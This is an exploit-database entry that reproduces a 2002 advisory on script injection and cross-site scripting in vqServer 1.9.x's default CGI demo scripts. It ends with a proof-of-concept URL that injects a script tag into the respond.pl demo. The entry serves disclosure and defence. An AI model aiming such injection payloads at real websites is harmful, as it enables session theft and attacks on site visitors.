vqServer 1.9.x - CGI Demo Program Script Injection

EDB-ID:

21411




Platform:

CGI

Date:

2002-04-21


source: https://www.securityfocus.com/bid/4573/info

vqServer is a HTTP server implemented in Java. vqServer is available on any architecture supporting Java, including Linux and Microsoft Windows.

Reportedly, numerous default CGI scripts included with vqServer suffer from script injection issues, including cross site scripting and the ability to inject script code into cookie content.

http://localhost/cgi/vq/demos/respond.pl<SCRIPT>alert("I%20should%20not%20be%20able%20to%20do%20this!!!")</SCRIPT>